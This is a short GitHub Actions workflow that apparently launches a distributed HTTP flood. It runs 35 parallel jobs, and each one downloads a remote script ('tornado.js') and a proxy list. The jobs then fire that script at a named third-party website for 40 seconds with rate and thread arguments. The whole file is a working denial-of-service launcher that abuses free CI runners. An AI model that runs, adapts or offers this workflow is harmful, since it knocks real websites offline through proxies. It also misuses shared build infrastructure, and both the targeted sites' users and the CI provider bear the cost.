name: Ubuntu VDS 40 saniye

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 35
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35]

    steps:
      - name: OK !
        run: |
          wget https://github.com/kaneious/tornado/raw/refs/heads/main/tornado.js
          wget https://curl.by/3fd1E/proxies.txt
          npm i hpack
          timeout 40 node tornado.js GET https://hexbear.xyz/ton 50 8 90 proxies.txt --full --query 3
          
      - name: OK !
        run: |
          sleep 40
          exit 0
